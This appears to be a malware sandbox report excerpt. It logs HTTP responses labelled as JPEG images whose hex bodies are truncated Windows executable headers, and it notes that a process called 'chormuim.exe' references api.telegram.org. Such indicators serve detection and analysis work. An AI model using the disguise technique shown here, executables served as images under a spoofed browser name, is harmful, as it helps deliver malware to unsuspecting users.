Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:21 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 06 Jun 2019 09:01:52 GMTAccept-Ranges: bytesContent-Length: 144848Keep-Alive: timeout=5, max=75Content-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:22 GMTServer: ApacheLast-Modified: Mon, 07 Aug 2017 00:52:20 GMTAccept-Ranges: bytesContent-Length: 645592Keep-Alive: timeout=5, max=74Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:23 GMTServer: ApacheLast-Modified: Thu, 06 Jun 2019 09:00:58 GMTAccept-Ranges: bytesContent-Length: 334288Keep-Alive: timeout=5, max=73Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:24 GMTServer: ApacheLast-Modified: Thu, 06 Jun 2019 09:01:20 GMTAccept-Ranges: bytesContent-Length: 137168Keep-Alive: timeout=5, max=72Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:24 GMTServer: ApacheLast-Modified: Thu, 06 Jun 2019 09:01:30 GMTAccept-Ranges: bytesContent-Length: 440120Keep-Alive: timeout=5, max=71Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:25 GMTServer: ApacheLast-Modified: Thu, 06 Jun 2019 09:01:44 GMTAccept-Ranges: bytesContent-Length: 1246160Keep-Alive: timeout=5, max=70Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:27 GMTServer: ApacheLast-Modified: Thu, 06 Jun 2019 09:02:02 GMTAccept-Ranges: bytesContent-Length: 83784Keep-Alive: timeout=5, max=69Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp String found in binary or memory: http://api.telegram.org
